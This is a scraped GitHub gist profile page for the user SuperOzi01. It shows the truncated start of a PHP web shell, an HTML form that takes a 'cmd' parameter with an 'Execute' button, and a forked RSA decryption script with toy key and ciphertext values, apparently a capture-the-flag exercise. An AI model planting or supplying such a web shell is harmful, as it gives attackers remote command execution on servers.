Skip to content

Instantly share code, notes, and snippets.

View SuperOzi01's full-sized avatar
👾
Mastermind

Ali Abdullah SuperOzi01

👾
Mastermind
View GitHub Profile
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@SuperOzi01
SuperOzi01 / rsa.py
Created September 17, 2021 04:20 — forked from Hikariii/rsa.py
Decrypt RSA encrypted data with Nec given
#!python3.2
primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
rsaNec = [
[1079,23,245], [3431,29,1229], [3053,163,1831], [3337,11,2599], [1081,43,225],
[1679,89,792], [287,41,185], [713,53,394], [713,13,11], [2867,11,707],
[1333,41,815], [1037,43,413], [2813,5,1579], [267,5,158], [473,23,23],
[6497,7,863], [511,5,491], [2491,7,684], [1909,7,782], [299,13,116],
[851,13,487], [623,7,83], [3403,13,2519], [1157,7,679], [1643,7,572], [1679,5,362],
]